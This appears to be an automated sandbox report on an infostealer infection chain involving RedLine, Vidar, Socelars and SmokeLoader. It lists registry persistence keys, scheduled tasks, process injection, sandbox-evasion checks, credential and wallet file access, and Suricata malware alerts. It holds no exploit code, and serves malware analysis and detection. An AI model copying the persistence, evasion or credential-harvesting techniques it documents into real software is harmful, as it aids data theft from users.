redline | 8485c644c0a96ff0d9256b10e2c50ee462868432080b6f27869d96edf77a7d0e

Change Default File Association

T1042

description	ioc	Process
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDriveSetup.exe

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4112	3312	rundll32.exe	19
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5660	3312	rundll32.exe	19
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6556	3312	rundll32.exe	19

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

resource	yara_rule
behavioral8/memory/5712-410-0x000000000041C5E2-mapping.dmp	family_redline

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral8/files/0x000400000001ab2d-149.dat	family_socelars
behavioral8/files/0x000400000001ab2d-175.dat	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 5096 created 4724	5096	WerFault.exe	103

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1936 created 528	1936	svchost.exe	260

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
suricata
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral8/memory/4272-216-0x0000000003410000-0x00000000034E1000-memory.dmp	family_vidar
behavioral8/memory/4272-220-0x0000000000400000-0x00000000017F4000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral8/files/0x000400000001ab27-123.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab27-125.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab26-124.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab26-129.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab26-130.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab29-128.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab29-131.dat	aspack_v212_v242

Blocklisted process makes network request 48 IoCs

flow	pid	Process
190	3360	MsiExec.exe
192	3360	MsiExec.exe
194	3360	MsiExec.exe
196	3360	MsiExec.exe
198	3360	MsiExec.exe
199	3360	MsiExec.exe
200	3360	MsiExec.exe
206	3360	MsiExec.exe
207	3360	MsiExec.exe
208	3360	MsiExec.exe
210	3360	MsiExec.exe
211	3360	MsiExec.exe
212	3360	MsiExec.exe
214	3360	MsiExec.exe
216	3360	MsiExec.exe
217	3360	MsiExec.exe
219	3360	MsiExec.exe
220	3360	MsiExec.exe
222	3360	MsiExec.exe
223	3360	MsiExec.exe
224	3360	MsiExec.exe
226	3360	MsiExec.exe
228	3360	MsiExec.exe
229	3360	MsiExec.exe
231	3360	MsiExec.exe
233	3360	MsiExec.exe
234	3360	MsiExec.exe
235	3360	MsiExec.exe
237	3360	MsiExec.exe
238	3360	MsiExec.exe
239	3360	MsiExec.exe
241	3360	MsiExec.exe
242	3360	MsiExec.exe
243	3360	MsiExec.exe
245	3360	MsiExec.exe
246	3360	MsiExec.exe
250	3360	MsiExec.exe
252	3360	MsiExec.exe
254	3360	MsiExec.exe
255	3360	MsiExec.exe
256	3360	MsiExec.exe
257	3360	MsiExec.exe
258	3360	MsiExec.exe
260	3360	MsiExec.exe
262	3360	MsiExec.exe
263	3360	MsiExec.exe
264	3360	MsiExec.exe
265	3360	MsiExec.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	46807GHF____.exe

Executes dropped EXE 64 IoCs

pid	Process
704	setup_installer.exe
1916	setup_install.exe
4216	Sun152260a303c33a7.exe
4248	Sun157ff8e4440aa.exe
4260	Sun15223697c98.exe
4272	Sun150d896340a863.exe
4296	Sun15b61bf18b0f1.exe
4320	Sun150faeb3537d.exe
4340	Sun1584240df9fe73a3.exe
4368	Sun15d8dfe2c6d17.exe
4432	Sun157a449716c8ee483.exe
4584	Sun15b61bf18b0f1.tmp
4816	46807GHF____.exe
4888	LzmwAqmV.exe
4972	4479475.exe
5012	3673961.exe
5104	Chrome 5.exe
4484	PublicDwlBrowser1100.exe
3000	2.exe
4664	1723234.exe
4724	setup.exe
656	udptest.exe
1152	WinHoster.exe
900	setup_2.exe
1664	3002.exe
1940	setup_2.tmp
4460	jhuuee.exe
2752	8.exe
4884	Conhost.exe
868	setup_2.exe
2236	setup_2.tmp
3612	3002.exe
4636	civdata.exe
1572	4345284.exe
5180	8906706.exe
5420	1559656.exe
5712	8906706.exe
5744	LzmwAqmV.exe
5280	inupda.exe
4948	inupda.exe
5688	FoxyIDM621d.exe
6040	sqtvvs.exe
2780	IDM1.tmp
4100	sqtvvs.exe
6060	ultramediaburner.exe
4524	ultramediaburner.tmp
5768	ZHikoviralo.exe
5328	UltraMediaBurner.exe
2088	Burikazhehae.exe
5876	services64.exe
6088	downloadmanager.exe
4776	GcleanerEU.exe
6184	installer.exe
6512	anyname.exe
5752	sqtvvs.exe
6664	gcleaner.exe
6008	tvps.exe
4548	civdata.exe
4636	civdata.exe
4836	sqtvvs.exe
4072	sihost64.exe
4500	253C.exe
4916	5E8D.exe
2728	sqtvvs.exe

Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	ZHikoviralo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	civdata.exe

Loads dropped DLL 51 IoCs

pid	Process
1916	setup_install.exe
1916	setup_install.exe
1916	setup_install.exe
1916	setup_install.exe
1916	setup_install.exe
1916	setup_install.exe
4584	Sun15b61bf18b0f1.tmp
1940	setup_2.tmp
2236	setup_2.tmp
4576	rundll32.exe
4576	rundll32.exe
4272	Sun150d896340a863.exe
4272	Sun150d896340a863.exe
6184	installer.exe
6184	installer.exe
6184	installer.exe
6996	MsiExec.exe
6996	MsiExec.exe
6616	rundll32.exe
3360	MsiExec.exe
3360	MsiExec.exe
3360	MsiExec.exe
3360	MsiExec.exe
3360	MsiExec.exe
3360	MsiExec.exe
3360	MsiExec.exe
3360	MsiExec.exe
3360	MsiExec.exe
3360	MsiExec.exe
6184	installer.exe
3360	MsiExec.exe
3360	MsiExec.exe
5572	MsiExec.exe
5572	MsiExec.exe
5572	MsiExec.exe
5572	MsiExec.exe
5572	MsiExec.exe
5572	MsiExec.exe
5572	MsiExec.exe
3360	MsiExec.exe
4916	5E8D.exe
4916	5E8D.exe
4916	5E8D.exe
4916	5E8D.exe
4916	5E8D.exe
6828	FileSyncConfig.exe
6828	FileSyncConfig.exe
6828	FileSyncConfig.exe
6828	FileSyncConfig.exe
6828	FileSyncConfig.exe
6828	FileSyncConfig.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\downloadmanager.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\downloadmanager.\\downloadmanager.exe"	sqtvvs.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\""	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\""	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	3673961.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Quhaexoxygy.exe\""	46807GHF____.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	sqtvvs.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\X:	installer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\User_Feed_Synchronization-{4F246605-F333-40E5-8FE6-2ED3621ADF90}	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2559286294-2439613352-4032193287-1000	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\sqtvvs.exe	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\services64	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Azure-Update-Task	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 3724861EA99800C2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe

Suspicious use of SetThreadContext 36 IoCs

description	pid	Process	procid_target
PID 2608 set thread context of 2796	2608	svchost.exe	127
PID 5180 set thread context of 5712	5180	8906706.exe	140
PID 5280 set thread context of 4948	5280	inupda.exe	152
PID 6040 set thread context of 4100	6040	sqtvvs.exe	160
PID 4548 set thread context of 4636	4548	civdata.exe	225
PID 5752 set thread context of 4836	5752	sqtvvs.exe	233
PID 5876 set thread context of 2680	5876	services64.exe	240
PID 2728 set thread context of 6916	2728	sqtvvs.exe	251
PID 6736 set thread context of 5348	6736	sqtvvs.exe	264
PID 4596 set thread context of 6856	4596	sqtvvs.exe	271
PID 4392 set thread context of 204	4392	sqtvvs.exe	277
PID 6972 set thread context of 7024	6972	sqtvvs.exe	287
PID 6252 set thread context of 6652	6252	sqtvvs.exe	289
PID 5580 set thread context of 3756	5580	sqtvvs.exe	291
PID 2312 set thread context of 4624	2312	sqtvvs.exe	295
PID 5696 set thread context of 6872	5696	sqtvvs.exe	299
PID 6596 set thread context of 6224	6596	sqtvvs.exe	301
PID 4736 set thread context of 1088	4736	sqtvvs.exe	304
PID 2316 set thread context of 5788	2316	sqtvvs.exe	306
PID 5764 set thread context of 5856	5764	sqtvvs.exe	310
PID 7004 set thread context of 5928	7004	sqtvvs.exe	312
PID 6112 set thread context of 6512	6112	sqtvvs.exe	314
PID 7096 set thread context of 6612	7096	sqtvvs.exe	316
PID 384 set thread context of 1000	384	sqtvvs.exe	319
PID 5084 set thread context of 1012	5084	sqtvvs.exe	321
PID 1736 set thread context of 1740	1736	sqtvvs.exe	323
PID 2144 set thread context of 3012	2144	sqtvvs.exe	325
PID 600 set thread context of 380	600	sqtvvs.exe	330
PID 4296 set thread context of 6948	4296	sqtvvs.exe	332
PID 4644 set thread context of 4712	4644	sqtvvs.exe	334
PID 4736 set thread context of 4768	4736	sqtvvs.exe	336
PID 5060 set thread context of 6252	5060	sqtvvs.exe	340
PID 96 set thread context of 6600	96	sqtvvs.exe	342
PID 7100 set thread context of 5532	7100	sqtvvs.exe	344
PID 5988 set thread context of 6604	5988	sqtvvs.exe	346
PID 3656 set thread context of 2616	3656	sqtvvs.exe	350

Drops file in Program Files directory 18 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Mail\Quhaexoxygy.exe	46807GHF____.exe
File created	C:\Program Files (x86)\Windows Mail\Quhaexoxygy.exe.config	46807GHF____.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File created	C:\Program Files\Internet Explorer\TAHLZEKRLB\ultramediaburner.exe	46807GHF____.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-HAAPS.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File created	C:\Program Files\Internet Explorer\TAHLZEKRLB\ultramediaburner.exe.config	46807GHF____.exe
File created	C:\Program Files (x86)\FarLabUninstaller\is-EPA6H.tmp	setup_2.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-7UP51.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp

Drops file in Windows directory 49 IoCs

description	ioc	Process
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	Explorer.EXE
File opened for modification	C:\Windows\Installer\MSIEDA7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFAC9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI39.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF44.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI108D.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1748.tmp	msiexec.exe
File created	C:\Windows\Installer\f74e0b1.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEB02.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIED47.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSIED67.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1244.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI889.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI12A3.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\f74e0b1.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEDD6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1DF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE96.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSI859.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID6D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEE6.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\Installer\f74e0b4.msi	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSIECD7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIED27.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF98F.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 15 IoCs

pid	pid_target	Process	procid_target
1776	4432	WerFault.exe	86
2880	3000	WerFault.exe	102
4416	4432	WerFault.exe	86
3792	4724	WerFault.exe	103
4468	4432	WerFault.exe	86
4372	4724	WerFault.exe	103
4224	4432	WerFault.exe	86
5280	4724	WerFault.exe	103
5636	4724	WerFault.exe	103
5804	5180	WerFault.exe	135
5888	4724	WerFault.exe	103
6008	4724	WerFault.exe	103
6040	4432	WerFault.exe	86
5096	4724	WerFault.exe	103
5396	4972	WerFault.exe	106

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vecgdru
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vecgdru
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun15223697c98.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun15223697c98.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vecgdru
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vecgdru
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vecgdru
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vecgdru
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun15223697c98.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Sun150d896340a863.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Sun150d896340a863.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5288	schtasks.exe
1224	schtasks.exe
2728	schtasks.exe
5672	schtasks.exe
4388	schtasks.exe

Delays execution with timeout.exe 7 IoCs

evasion

pid	Process
6268	timeout.exe
5132	timeout.exe
4916	timeout.exe
4656	timeout.exe
3328	timeout.exe
7132	timeout.exe
6176	timeout.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
6984	taskkill.exe
5484	taskkill.exe
1804	taskkill.exe
5792	taskkill.exe
5448	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 7 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe

Modifies data under HKEY_USERS 19 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
